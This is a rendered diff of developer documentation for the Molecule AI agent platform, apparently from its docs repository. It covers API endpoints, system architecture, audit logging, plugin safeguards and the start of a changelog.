| DELETE | `/workspaces/:id/schedules/:scheduleId` | WorkspaceAuth | Delete a schedule. |
| POST | `/workspaces/:id/schedules/:scheduleId/run` | WorkspaceAuth | Manually trigger a schedule immediately. |
| GET | `/workspaces/:id/schedules/:scheduleId/history` | WorkspaceAuth | List past runs for a schedule. Includes status (`success`, `error`, `skipped`) and `error_detail`. |
Schedule `source` field: `template` for org/import-seeded schedules, `runtime` for Canvas/API-created. The `last_status` value includes `skipped` when the concurrency-aware scheduler skips a run because the workspace is busy.
---
## Channels
Social channel integrations (Telegram, Slack, etc.) for workspace agents.
### Per-Workspace Channels
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/channels` | WorkspaceAuth | List channels for a workspace. |
| POST | `/workspaces/:id/channels` | WorkspaceAuth | Create a channel. Body includes platform type, JSONB config, and allowlist. |
| PATCH | `/workspaces/:id/channels/:channelId` | WorkspaceAuth | Update a channel's config or allowlist. |
| DELETE | `/workspaces/:id/channels/:channelId` | WorkspaceAuth | Delete a channel. |
| POST | `/workspaces/:id/channels/:channelId/send` | WorkspaceAuth | Send an outbound message through the channel. |
| POST | `/workspaces/:id/channels/:channelId/test` | WorkspaceAuth | Test the channel connection (send a test message). |
### Global Channel Endpoints
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/channels/adapters` | None | List available social platform adapters (Telegram, Slack, etc.). |
| POST | `/channels/discover` | AdminAuth | Auto-detect available chats/groups for a bot token. |
| POST | `/webhooks/:type` | None | Incoming webhook endpoint for social platforms. The `:type` parameter identifies the platform (e.g., `telegram`, `slack`). |
---
## Plugins
Plugin registry and per-workspace plugin management.
### Global Plugin Registry
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/plugins` | None | List all plugins in the registry. Supports `?runtime=` filter to show only compatible plugins. |
| GET | `/plugins/sources` | None | List registered install-source schemes (e.g., `github://`, `local://`). |
### Per-Workspace Plugins
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/plugins` | WorkspaceAuth | List installed plugins for a workspace. |
| POST | `/workspaces/:id/plugins` | WorkspaceAuth | Install a plugin. Body: `{ "source": "github://org/repo" }`. Safeguards: 64 KiB body limit, 5 min fetch timeout, 100 MiB max staged-tree. |
| DELETE | `/workspaces/:id/plugins/:name` | WorkspaceAuth | Uninstall a plugin by name. |
| GET | `/workspaces/:id/plugins/available` | WorkspaceAuth | List plugins available for this workspace (filtered by workspace runtime). |
| GET | `/workspaces/:id/plugins/compatibility` | WorkspaceAuth | Preflight runtime-change check. Query: `?runtime=X`. Returns which currently-installed plugins would be incompatible with the target runtime. |
---
## Auth Tokens
Bearer token management for workspaces.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/tokens` | WorkspaceAuth | List active tokens for a workspace (token values are masked). |
| POST | `/workspaces/:id/tokens` | WorkspaceAuth | Create a new bearer token for the workspace. |
| DELETE | `/workspaces/:id/tokens/:tokenId` | WorkspaceAuth | Revoke a specific token. |
### Test Token (Development Only)
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/admin/workspaces/:id/test-token` | None | Mint a fresh bearer token for E2E scripts. Returns 404 unless `MOLECULE_ENV != production` or `MOLECULE_ENABLE_TEST_TOKENS=1`. |
---
## Teams
Expand and collapse team views in the Canvas hierarchy.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/expand` | WorkspaceAuth | Expand a team workspace to show its children on the canvas. |
| POST | `/workspaces/:id/collapse` | WorkspaceAuth | Collapse a team workspace to hide its children. |
---
## Templates and Bundles
### Templates
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/templates` | AdminAuth | List available workspace templates with their runtime, description, and config schema. |
| POST | `/templates/import` | AdminAuth | Import a workspace template from a `github://` source URL. |
### Org Templates
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/org/templates` | AdminAuth | List available organization templates. |
| POST | `/org/import` | AdminAuth | Import an org template. Applies `resolveInsideRoot` path sanitization. Creates the full workspace hierarchy defined in `org.yaml`. |
### Bundles
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/bundles/export/:id` | AdminAuth | Export a workspace (or workspace tree) as a portable bundle. Includes config, secrets (keys only), memory, schedules, and hierarchy. |
| POST | `/bundles/import` | AdminAuth | Import a previously-exported bundle. Recreates the workspace tree with all associated data. |
---
## Approvals
Human-in-the-loop approval system for agent actions.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/approvals` | WorkspaceAuth | Create an approval request. Body includes the action description, metadata, and options. |
| GET | `/workspaces/:id/approvals` | WorkspaceAuth | List approval requests for a workspace. |
| POST | `/workspaces/:id/approvals/:approvalId/decide` | WorkspaceAuth | Approve or reject an approval request. Body: `{ "decision": "approve" }` or `{ "decision": "reject" }`. |
| GET | `/approvals/pending` | AdminAuth | List all pending approval requests across all workspaces. |
---
## Canvas
Canvas viewport persistence (cosmetic only).
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/canvas/viewport` | None | Get the saved canvas viewport (zoom, pan position). Open endpoint for bootstrap-friendliness. |
| PUT | `/canvas/viewport` | CanvasOrBearer | Save the canvas viewport. Accepts bearer OR matching `Origin` header. Worst case on forgery: viewport corruption, recovered by page refresh. |
---
## Traces
LLM trace retrieval from Langfuse.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/traces` | WorkspaceAuth | List LLM traces for a workspace from Langfuse. |
---
## Audit Ledger (HMAC Chain Verification)
HMAC-SHA256-chained immutable agent event log for compliance record-keeping (EU AI Act Art. 12 / Art. 13). Each event is cryptographically chained to the previous one — tampering with any record breaks all subsequent HMACs.
<Callout type="warn">
**`AUDIT_LEDGER_SALT` required.** The platform and workspace containers must share the same `AUDIT_LEDGER_SALT` environment variable to compute and verify event HMACs. Set it in both your platform env and workspace container env. If the variable is absent, `chain_valid` returns `null` (not `false`) — no records are lost, verification is simply unavailable.
</Callout>
### Query
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/audit` | WorkspaceAuth | Query the audit ledger for a workspace. Returns events in descending chronological order with inline chain verification. |
**Query parameters:**
| Parameter | Type | Description |
|-----------|------|-------------|
| `agent_id` | string | Filter to a specific agent. |
| `session_id` | string | Filter to a specific session. |
| `from` | RFC 3339 | Start of time range (e.g. `2026-04-01T00:00:00Z`). |
| `to` | RFC 3339 | End of time range. |
| `limit` | int | Max records to return. Capped at **500**. |
| `offset` | int | Pagination offset. |
**Response shape:**
```json
{
"events": [
{
"id": "uuid",
"workspace_id": "uuid",
"agent_id": "my-researcher",
"session_id": "sess_abc123",
"event_type": "tool_call",
"payload": { "tool": "bash", "input": "ls /workspace" },
"hmac": "sha256hex...",
"prev_hmac": "sha256hex...",
"created_at": "2026-04-17T12:00:00Z"
}
],
"chain_valid": true
}
```
`chain_valid` values:
- `true` — all HMACs verified; ledger is intact.
- `false` — at least one HMAC mismatch; possible tampering.
- `null` — `AUDIT_LEDGER_SALT` is absent from the platform env; verification skipped.
### Workspace-side: recording events
In your workspace template, wire `LedgerHooks` into the agent pipeline:
```python
from molecule_audit.hooks import LedgerHooks
hooks = LedgerHooks(agent_id="my-researcher", session_id=session_id)
async with hooks:
# hooks.on_task_start / on_llm_call / on_tool_call / on_task_end
# fire automatically at each pipeline stage
result = await agent.run(task)
```
`LedgerHooks` is exception-safe — a failed ledger write never aborts the agent task.
### CLI chain verification
```bash
# Verify the full chain for an agent; exit 0 = intact
python -m molecule_audit.verify --agent-id my-researcher
# Custom DB URL
python -m molecule_audit.verify --agent-id my-researcher --db postgresql://user:pass@host/db
```
Exit codes: `0` = chain valid · `1` = broken chain · `2` = `AUDIT_LEDGER_SALT` missing · `3` = DB error.
---
## Events
Append-only event log for structure changes.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/events` | AdminAuth | List all structure events across all workspaces. |
| GET | `/events/:workspaceId` | AdminAuth | List structure events for a specific workspace. |
---
## Terminal
WebSocket-based terminal access to workspace containers.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| WS | `/workspaces/:id/terminal` | WorkspaceAuth | Open a WebSocket terminal session to the workspace container. Provides interactive shell access. |
---
## WebSocket
Real-time event streaming for Canvas clients.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| WS | `/ws` | None | Connect to the WebSocket hub. Receives all structure events (`WORKSPACE_ONLINE`, `WORKSPACE_OFFLINE`, `HEARTBEAT`, `CONFIG_UPDATED`, `A2A_RESPONSE`, `AGENT_MESSAGE`, etc.). Canvas clients connect here for real-time updates. |
---
## Server-Sent Events (AG-UI)
Per-workspace SSE stream compatible with the [AG-UI protocol](https://github.com/ag-ui-protocol/ag-ui). Use this endpoint to consume structured agent events from a web client or external tool without a WebSocket library.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/events/stream` | WorkspaceAuth | Open an SSE stream for the workspace. Returns `Content-Type: text/event-stream`. Sends an initial `: ping` comment on connect, then delivers every event emitted by the workspace in AG-UI envelope format. Events from other workspaces are filtered out. Returns `404` if the workspace does not exist. |
### Event envelope format
Each event is delivered as an SSE `data:` line containing a JSON object:
```json
{
"type": "AGENT_MESSAGE",
"timestamp": 1713398400000,
"data": { ... }
}
```
- **`type`** — event type string (e.g. `AGENT_MESSAGE`, `A2A_RESPONSE`, `TASK_UPDATED`)
- **`timestamp`** — Unix milliseconds at time of broadcast
- **`data`** — event-specific payload (same payload as the WebSocket hub delivers)
### Event types streamed
All event types emitted by `RecordAndBroadcast` **and** `BroadcastOnly` reach the SSE stream. The `BroadcastOnly` path is important: events like `AGENT_MESSAGE`, `A2A_RESPONSE`, and `TASK_UPDATED` skip Redis and would be invisible to a Redis-only subscriber — the in-process SSE layer catches them.
### Example: connect with `curl`
```bash
curl -N \
-H "Authorization: Bearer <workspace-token>" \
http://localhost:8080/workspaces/<id>/events/stream
```
```
: ping
data: {"type":"AGENT_MESSAGE","timestamp":1713398401234,"data":{"text":"Starting task..."}}
data: {"type":"TASK_UPDATED","timestamp":1713398405678,"data":{"status":"running"}}
```
### Example: connect from JavaScript
```js
// NOTE: the browser-native EventSource API cannot send custom headers
// (such as Authorization). Use fetch() with a streaming reader, or an
// SSE client library that supports custom headers.
const res = await fetch(`/workspaces/${workspaceId}/events/stream`, {
  headers: { Authorization: `Bearer ${token}` },
});
const reader = res.body.getReader();
const decoder = new TextDecoder();
let buffer = "";
while (true) {
  const { value, done } = await reader.read();
  if (done) break;
  buffer += decoder.decode(value, { stream: true });
  const lines = buffer.split("\n");
  buffer = lines.pop();
  for (const line of lines) {
    if (line.startsWith("data: ")) {
      const event = JSON.parse(line.slice("data: ".length));
      console.log(event.type, event.data);
    }
  }
}
```
<Callout type="info">
The SSE endpoint uses WorkspaceAuth — the bearer token must be bound to the `:id` in the path. A token for workspace A cannot open a stream for workspace B.
</Callout>
---
## Error Responses
All endpoints return standard HTTP status codes:
| Status | Meaning |
|--------|---------|
| 200 | Success |
| 201 | Created |
| 400 | Bad request (malformed body, missing required fields) |
| 401 | Unauthorized (missing or invalid bearer token) |
| 403 | Forbidden (valid token but insufficient access) |
| 404 | Not found (workspace, schedule, channel, etc. does not exist) |
| 409 | Conflict (idempotency key collision on delegation) |
| 429 | Rate limited (exceeds `RATE_LIMIT` requests/min) |
| 500 | Internal server error |
Error response body format:
```json
{
"error": "human-readable error message"
}
```
---
## Rate Limiting
All endpoints are subject to a global rate limit of `RATE_LIMIT` requests per minute (default: 600). When exceeded, the platform returns `429 Too Many Requests` with a `Retry-After` header.
---
## CORS
The platform sets CORS headers based on the `CORS_ORIGINS` environment variable (comma-separated list, default: `http://localhost:3000,http://localhost:3001`). Preflight (`OPTIONS`) requests are handled automatically by the Gin CORS middleware.

View File

@ -0,0 +1,361 @@
---
title: Architecture
description: System architecture, components, infrastructure, and communication model for the Molecule AI platform.
---
# Architecture
Molecule AI is a platform for orchestrating AI agent workspaces that form an organizational hierarchy. Workspaces register with a central platform, communicate via A2A (Agent-to-Agent) protocol, and are visualized on a drag-and-drop canvas.
## System Overview
```
Canvas (Next.js :3000) <--WebSocket--> Platform (Go :8080) <--HTTP--> Postgres + Redis
|
Workspace A <----A2A----> Workspace B
(Python agents)
| register/heartbeat |
+------ Platform ----+
```
The Canvas provides the visual interface, the Platform acts as the control plane, and Workspaces are isolated containers running AI agent runtimes. All inter-agent communication is mediated by the Platform via the A2A proxy, which enforces hierarchical access control.
---
## Four Main Components
### Canvas
**Stack:** Next.js 15 + React Flow (@xyflow/react v12) + Zustand + Tailwind CSS
The Canvas is the browser-based visual workspace graph. It provides:
- **Drag-and-drop layout** with persistent node positions (saved via `PATCH /workspaces/:id`)
- **Team nesting** using recursive `TeamMemberChip` components (up to 3 levels deep)
- **Real-time status** via WebSocket connection to the Platform
- **Chat interface** with two sub-tabs: "My Chat" (user-to-agent) and "Agent Comms" (agent-to-agent A2A traffic)
- **Config editor** with "Save & Restart" and "Save" (deferred restart) modes
- **Secrets management** with auto-restart on POST/DELETE
**State management:**
| Concern | Mechanism |
|---------|-----------|
| Initial load | HTTP fetch `GET /workspaces` into Zustand |
| Real-time updates | WebSocket events via `applyEvent()` |
| Position persistence | `onNodeDragStop` sends `PATCH /workspaces/:id` with `{x, y}` |
| Node nesting | `nestNode` sets `hidden: !!targetId`; children render inside parent |
**Environment variables:**
| Variable | Default | Purpose |
|----------|---------|---------|
| `NEXT_PUBLIC_PLATFORM_URL` | `http://localhost:8080` | Platform API base URL |
| `NEXT_PUBLIC_WS_URL` | `ws://localhost:8080/ws` | WebSocket endpoint |
### Platform
**Stack:** Go / Gin
The Platform is the central control plane responsible for:
- **Workspace CRUD** -- create, read, update, delete workspaces
- **Registry** -- workspace registration, heartbeat tracking, agent card management
- **Discovery** -- peer lookup, access control checks
- **WebSocket hub** -- real-time event broadcasting to Canvas clients
- **Liveness monitoring** -- three-layer container health detection
- **A2A proxy** -- routes inter-agent messages with hierarchical access control
- **Docker provisioner** -- container lifecycle management with tier-based resource limits
- **Scheduler** -- cron-based scheduled tasks per workspace
- **Channel adapters** -- social integrations (Telegram, Slack, etc.)
**Key environment variables:**
| Variable | Default | Purpose |
|----------|---------|---------|
| `DATABASE_URL` | (required) | Postgres connection string |
| `REDIS_URL` | (required) | Redis connection string |
| `PORT` | `8080` | Server listen port |
| `PLATFORM_URL` | `http://host.docker.internal:PORT` | URL passed to agent containers |
| `SECRETS_ENCRYPTION_KEY` | (optional) | AES-256 key, 32 bytes |
| `CORS_ORIGINS` | `http://localhost:3000,http://localhost:3001` | Allowed CORS origins |
| `RATE_LIMIT` | `600` | Requests per minute |
| `MOLECULE_ENV` | (optional) | Set `production` to hide test endpoints |
| `MOLECULE_ORG_ID` | (optional) | SaaS tenant org gating |
| `WORKSPACE_DIR` | (optional) | Global fallback host path for `/workspace` bind-mount |
| `AWARENESS_URL` | (optional) | Injected into workspace containers for cross-session memory |
| `ACTIVITY_RETENTION_DAYS` | `7` | How long activity logs are kept |
| `ACTIVITY_CLEANUP_INTERVAL_HOURS` | `6` | Cleanup sweep interval |
**Workspace tier resource limits:**
| Tier | Env (Memory) | Env (CPU) | Defaults |
|------|-------------|-----------|----------|
| Standard (Tier 2) | `TIER2_MEMORY_MB` | `TIER2_CPU_SHARES` | 512 MB / 1 CPU |
| Privileged (Tier 3) | `TIER3_MEMORY_MB` | `TIER3_CPU_SHARES` | 2048 MB / 2 CPU |
| Full-host (Tier 4) | `TIER4_MEMORY_MB` | `TIER4_CPU_SHARES` | 4096 MB / 4 CPU |
### Workspace Runtime
**Published as:** [`molecule-ai-workspace-runtime`](https://pypi.org/project/molecule-ai-workspace-runtime/) on PyPI
The shared runtime provides the base agent infrastructure: A2A server, heartbeat loop, config loading, platform auth, plugin system, and built-in tools. Each AI framework adapter lives in its own standalone repository.
| Runtime | Standalone Repo | Key Dependencies |
|---------|-----------------|------------------|
| LangGraph | `molecule-ai-workspace-template-langgraph` | langchain-anthropic, langgraph |
| Claude Code | `molecule-ai-workspace-template-claude-code` | claude-agent-sdk, @anthropic-ai/claude-code |
| OpenClaw | `molecule-ai-workspace-template-openclaw` | openclaw (npm) |
| CrewAI | `molecule-ai-workspace-template-crewai` | crewai |
| AutoGen | `molecule-ai-workspace-template-autogen` | autogen |
| DeepAgents | `molecule-ai-workspace-template-deepagents` | deepagents |
| Hermes | `molecule-ai-workspace-template-hermes` | openai, anthropic, google-genai |
| Gemini CLI | `molecule-ai-workspace-template-gemini-cli` | @google/gemini-cli (npm) |
| [Google ADK](/docs/google-adk) | `molecule-ai-workspace-template-google-adk` | google-adk>=1.0.0 |
Each adapter repo has its own `Dockerfile` that installs `molecule-ai-workspace-runtime` from PyPI plus adapter-specific dependencies. Templates are cloned at Docker build time into the platform image via `manifest.json`.
### Framework Adapters (workspace-template)
Some workspace templates embed framework-specific adapters that extend `molecule-ai-workspace-runtime` with framework-level security controls. The **smolagents adapter** (`workspace-template/adapters/smolagents/`) ships two such controls:
**Environment sanitization** (`make_safe_env`) — child processes spawned by the smolagents adapter inherit a filtered copy of the host environment. The following are stripped before the subprocess starts:
- Any key listed in `SMOLAGENTS_ENV_DENYLIST` (comma-separated; set by the operator)
- Any key whose name ends in `_API_KEY` or `_TOKEN`
Set `SMOLAGENTS_ENV_DENYLIST=VAR1,VAR2` in the workspace's secrets to extend the denylist.
**Safe message delivery** (`safe_send_message`) — outbound smolagents messages are:
1. Prefixed with `[smolagents]` so the source is always attributable in logs and Canvas activity
2. Truncated at 2,000 characters to prevent oversized payloads
3. HTML-entity-escaped to block social-engineering injections embedded in agent output
These controls complement the platform-level secret redaction described in the [API Reference](/docs/api-reference#agent-memories-hma-scoped).
### molecli
**Stack:** Go / Bubbletea + Lipgloss
A terminal UI dashboard for real-time workspace monitoring, event log streaming, health overview, and delete/filter operations. Reads `MOLECLI_URL` (default `http://localhost:8080`) to locate the platform. Now published as a standalone repo at `github.com/Molecule-AI/molecule-cli`.
---
## Infrastructure Services
All services run via `docker-compose.infra.yml`, attached to the shared `molecule-monorepo-net` network. Start them with:
```bash
./infra/scripts/setup.sh # Start Postgres, Redis, Langfuse, Temporal; run migrations
```
### Postgres (port 5432)
Primary datastore for workspaces, events, activity logs, secrets, schedules, channels, and more. Also backs Langfuse and Temporal via separate databases.
Key tables:
| Table | Purpose |
|-------|---------|
| `workspaces` | Core entity -- status, runtime, agent_card, heartbeat, current_task |
| `canvas_layouts` | Persisted x/y positions |
| `structure_events` | Append-only event log |
| `activity_logs` | A2A communications, task updates, agent logs, errors |
| `workspace_schedules` | Cron tasks with expression, timezone, prompt, run history |
| `workspace_channels` | Social channel integrations with JSONB config |
| `workspace_secrets` / `global_secrets` | Encrypted secrets storage |
| `workspace_auth_tokens` | Bearer tokens (auto-revoked on workspace delete) |
| `agent_memories` | HMA-scoped agent memory |
| `approvals` | Human-in-the-loop approval requests |
**Migration runner:** On startup, the platform globs `*.sql` in the migrations directory, filters out `.down.sql` files, sorts alphabetically, and executes each. All `.up.sql` files must be idempotent (`CREATE TABLE IF NOT EXISTS`, `ALTER TABLE ... IF NOT EXISTS`).
**JSONB gotcha:** When inserting Go `[]byte` (from `json.Marshal`) into Postgres JSONB columns, you must convert to `string()` first and use `::jsonb` cast in SQL. The `lib/pq` driver treats `[]byte` as `bytea`, not JSONB.
### Redis (port 6379)
Used for pub/sub event broadcasting and heartbeat TTL tracking. Workspace heartbeat keys expire after 60 seconds -- expiry triggers the liveness monitor.
### Langfuse (port 3001)
LLM trace viewer backed by ClickHouse. Provides observability into agent LLM calls, token usage, and latency.
### Temporal (port 7233 gRPC, port 8233 Web UI)
Durable workflow engine for `workspace-template/builtin_tools/temporal_workflow.py`. Dev-only posture: the auto-setup image runs with no auth on `0.0.0.0:7233`. Production deployments must gate access via mTLS or an API key / reverse proxy.
---
## Communication Model
### WebSocket Events Flow
```
1. Action occurs (register, heartbeat, config change, etc.)
2. broadcaster.RecordAndBroadcast()
-> inserts into structure_events table
-> publishes to Redis pub/sub
3. Redis subscriber relays to WebSocket hub
4. Hub broadcasts to:
- Canvas clients (all events)
- Workspace clients (filtered by CanCommunicate)
```
### A2A Proxy
The A2A proxy (`POST /workspaces/:id/a2a`) routes agent-to-agent messages. The caller identifies itself via the `X-Workspace-ID` header and authenticates with `Authorization: Bearer <token>`.
### Access Control Rules
Determined by `CanCommunicate(callerID, targetID)` in `registry/access.go`:
| Relationship | Allowed |
|-------------|---------|
| Same workspace (self-call) | Yes |
| Siblings (same `parent_id`) | Yes |
| Root-level siblings (both `parent_id` IS NULL) | Yes |
| Parent to child / child to parent | Yes |
| System callers (`webhook:*`, `system:*`, `test:*`) | Yes (bypass) |
| Canvas requests (no `X-Workspace-ID`) | Yes (bypass) |
| Everything else | **Denied** |
### Import Cycle Prevention
The platform uses function injection to avoid Go import cycles between `ws`, `registry`, and `events` packages:
- `ws.NewHub(canCommunicate AccessChecker)` -- Hub accepts `registry.CanCommunicate` as a function
- `registry.StartLivenessMonitor(ctx, onOffline OfflineHandler)` -- Liveness accepts broadcaster callback
- `registry.StartHealthSweep(ctx, checker ContainerChecker, interval, onOffline)` -- Health sweep accepts Docker checker interface
- Wiring happens in `platform/cmd/server/main.go` -- init order: `wh -> onWorkspaceOffline -> liveness/healthSweep -> router`
---
## Container Health Detection
Three independent layers detect dead containers (e.g., Docker Desktop crash):
### Layer 1: Passive (Redis TTL)
Each workspace sends heartbeats that set a Redis key with a 60-second TTL. When the key expires, the liveness monitor detects the workspace as offline and triggers an auto-restart.
### Layer 2: Proactive (Health Sweep)
`registry.StartHealthSweep` polls the Docker API every 15 seconds. Catches dead containers faster than waiting for Redis TTL expiry.
### Layer 3: Reactive (A2A Proxy)
When the A2A proxy encounters a connection error to a workspace, it immediately checks `provisioner.IsRunning()`. If the container is dead, it marks the workspace offline and triggers a restart.
All three layers call `onWorkspaceOffline`, which broadcasts `WORKSPACE_OFFLINE` and initiates `wh.RestartByID()`. Redis cleanup uses the shared `db.ClearWorkspaceKeys()` function.
---
## Workspace Lifecycle
```
provisioning --> online (on register)
^ |
| degraded (error_rate > 0.5)
| |
| online (recovered)
| |
| offline (Redis TTL expired / health sweep)
| |
+--- auto-restart ---+
|
removed (deleted)
Any state --> paused (user pauses) --> provisioning (user resumes)
```
Paused workspaces skip health sweep, liveness monitor, and auto-restart.
**Restart context:** After any restart and successful re-registration, the platform sends a synthetic A2A `message/send` with `metadata.kind=restart_context` containing the restart timestamp, previous session info, and available env-var keys (keys only, never values). The sender uses the `system:restart-context` caller prefix to bypass `CanCommunicate`. If the workspace does not re-register within 30 seconds, the message is dropped.
**Initial prompt:** Agents can auto-execute a prompt on startup before any user interaction. Configure via `initial_prompt` (inline string) or `initial_prompt_file` (path relative to config dir) in `config.yaml`. A `.initial_prompt_done` marker file prevents re-execution on restart.
**Idle loop:** When `idle_prompt` is non-empty in `config.yaml`, the workspace self-sends it every `idle_interval_seconds` (default 600) while `heartbeat.active_tasks == 0`. The idle check is local (no LLM call) and the prompt only fires when the agent is genuinely idle.
---
## Deployment Modes
### Self-Hosted
Run the full stack on your own infrastructure using Docker Compose:
```bash
# Infrastructure only (Postgres, Redis, Langfuse, Temporal)
docker compose -f docker-compose.infra.yml up -d
# Full stack
docker compose up
```
### SaaS
Hosted at `moleculesai.app` with per-tenant isolation. Each tenant gets a dedicated Fly Machine running the tenant image. The `MOLECULE_ORG_ID` env var gates API access -- every non-allowlisted request must carry a matching `X-Molecule-Org-Id` header or gets a 404. When unset, the guard is a passthrough so self-hosted and dev environments are unaffected.
### Tenant Image
`platform/Dockerfile.tenant` bundles the Go platform + Canvas frontend + templates into a single container image, published to `ghcr.io/molecule-ai/platform:latest` and `:sha-<short>`.
---
## Subdomain Architecture
| Subdomain | Service | Purpose |
|-----------|---------|---------|
| `moleculesai.app` | Landing page | Marketing site |
| `app.moleculesai.app` | SaaS dashboard | Tenant management UI |
| `api.moleculesai.app` | Control plane API | Platform REST + WebSocket |
| `doc.moleculesai.app` | Documentation | This documentation site |
| `status.moleculesai.app` | Status page | Uptime and incident tracking |
| `*.moleculesai.app` | Tenant instances | Per-org isolated platform instances |
---
## Plugin System
Plugins extend workspace capabilities. Two categories exist:
**Shared plugins** (auto-loaded by every workspace):
- **molecule-dev** -- codebase conventions + review-loop skill
- **superpowers** -- verification, TDD, systematic debugging, writing plans
- **ecc** -- general Claude Code guardrails
- **browser-automation** -- Puppeteer/CDP web scraping and live canvas screenshots
**Modular guardrails** (opt-in per workspace):
- **Hook plugins** (ambient enforcement): `molecule-careful-bash`, `molecule-freeze-scope`, `molecule-audit-trail`, `molecule-session-context`, `molecule-prompt-watchdog`
- **Skill plugins** (on-demand): `molecule-skill-code-review`, `molecule-skill-cross-vendor-review`, `molecule-skill-llm-judge`, `molecule-skill-update-docs`, `molecule-skill-cron-learnings`
- **Workflow plugins** (slash commands): `molecule-workflow-triage`, `molecule-workflow-retro`
**Org-template plugin resolution:** The per-workspace `plugins:` list in an org template's `org.yaml` role override is unioned with `defaults.plugins` (deduplicated, defaults first). To opt a given role out of a specific default, prefix the plugin name with `!` or `-` (e.g. `!browser-automation`).
Plugin install safeguards:
| Parameter | Default | Purpose |
|-----------|---------|---------|
| `PLUGIN_INSTALL_BODY_MAX_BYTES` | 65536 (64 KiB) | Max request body size |
| `PLUGIN_INSTALL_FETCH_TIMEOUT` | 5m | Whole fetch+copy deadline |
| `PLUGIN_INSTALL_MAX_DIR_BYTES` | 104857600 (100 MiB) | Max staged-tree size |
---
## CI Pipeline
GitHub Actions runs on push to main and on pull requests:
| Job | What it does |
|-----|-------------|
| `platform-build` | Go build, vet, `go test -race` with 25% coverage threshold |
| `canvas-build` | npm build, vitest run (tests must exist and pass) |
| `python-lint` | pytest with coverage for workspace-template |
| `e2e-api` | Spins up Postgres + Redis, runs 62 API tests against locally-built binary |
| `shellcheck` | Lints all E2E shell scripts |
| `publish-platform-image` | Builds and pushes to `ghcr.io/molecule-ai/platform` (main only) |
Standalone repos (plugins + templates) use reusable workflows from `Molecule-AI/molecule-ci` for schema validation, secrets scanning, and Docker build smoke tests.

View File

@ -1,3 +1,6 @@
---
title: "System Architecture"
---
# System Architecture
## Overview

View File

@ -1,3 +1,6 @@
---
title: "Canary release pipeline"
---
# Canary release pipeline
How a workspace-server code change reaches the prod tenant fleet — and how to stop it if something's wrong.

View File

@ -1,3 +1,6 @@
---
title: "Database Schema"
---
# Database Schema
## Postgres Tables

View File

@ -1,3 +1,6 @@
---
title: "Event Log"
---
# Event Log
Every structural change appends an immutable row to `structure_events`. The table is **append-only** — rows are never updated or deleted. This is the event sourcing pattern.

View File

@ -1,3 +1,6 @@
---
title: "Memory Architecture (HMA)"
---
# Memory Architecture (HMA)
Molecule AI's memory model is built around one principle:

View File

@ -1,3 +1,6 @@
---
title: "Molecule AI — Comprehensive Technical Documentation"
---
# Molecule AI — Comprehensive Technical Documentation
> Definitive technical reference for the Molecule AI Agent Team platform.

View File

@ -1,3 +1,6 @@
---
title: "Architecture Overview"
---
# Architecture Overview
Molecule AI is a platform for orchestrating AI agent workspaces that form an organizational hierarchy. Workspaces register with a central platform, communicate via A2A protocol, and are visualized on a drag-and-drop canvas.

View File

@ -1,3 +1,6 @@
---
title: "Partner API Keys — Programmatic Org Management"
---
# Partner API Keys — Programmatic Org Management
> **Status:** Planned

View File

@ -1,3 +1,6 @@
---
title: "Provisioner"
---
# Provisioner
The provisioner is the platform component that deploys workspace containers and VMs. It is triggered when a workspace is created, imported from a bundle, or expanded into a team.

View File

@ -1,3 +1,6 @@
---
title: "SaaS prod migration — 2026-04-19"
---
# SaaS prod migration — 2026-04-19
Promoted staging → main on both `Molecule-AI/molecule-controlplane` and `Molecule-AI/molecule-core`. This note captures the prod cutover deltas so ops can cross-check against the running system.

View File

@ -1,3 +1,6 @@
---
title: "Staging Environment Design"
---
# Staging Environment Design
> **Status:** Planned — gates all future infra changes (Tunnel migration,

View File

@ -1,3 +1,6 @@
---
title: "Technology Choices"
---
# Technology Choices
This document explains why each technology was chosen for Molecule AI.

View File

@ -1,3 +1,6 @@
---
title: "Tenant Image Upgrade Strategies"
---
# Tenant Image Upgrade Strategies
> **Status:** Option B (sidecar auto-updater) implemented. Options A and C

View File

@ -1,3 +1,6 @@
---
title: "Wildcard DNS + Cloudflare Worker Proxy"
---
# Wildcard DNS + Cloudflare Worker Proxy
> **Status:** Planned — replaces per-tenant DNS record creation.

View File

@ -1,3 +1,6 @@
---
title: "Workspace Tiers"
---
# Workspace Tiers
Four tiers control the security boundary for each workspace. Higher tiers get more system access but less isolation.

217
content/docs/changelog.mdx Normal file
View File

@ -0,0 +1,217 @@
---
title: Changelog
description: Customer-facing release notes for Molecule AI — updated daily.
---
All notable changes to the Molecule AI platform are documented here.
Entries are published daily at 23:50 UTC.
---
## 2026-04-17
A high-velocity day: 80+ PRs merged across platform, canvas, runtimes, security, and channels.
### ✨ New features
#### opencode Integration — MCP bridge for AI coding agents
Connect [opencode](https://opencode.ai) to any Molecule AI workspace over a
standard `Authorization: Bearer` remote MCP connection. opencode gains the full
A2A tool surface (`delegate_task`, `list_peers`, `recall_memory`, and more)
via two transports: Streamable HTTP (`POST /workspaces/:id/mcp`) and SSE
(backwards-compat `GET /workspaces/:id/mcp/stream`). Rate-limited to 120 req/min
per token. See the [opencode Integration guide](/docs/opencode).
(#840, #842)
#### Slack — per-agent identity with Bot Token mode
The Slack channel adapter now supports dual-mode outbound: **Bot Token** (new,
recommended) and Incoming Webhook (legacy, unchanged). With a `bot_token` each
workspace posts under its own display name and icon via `chat:write.customize`.
Markdown is automatically converted to Slack `mrkdwn` format.
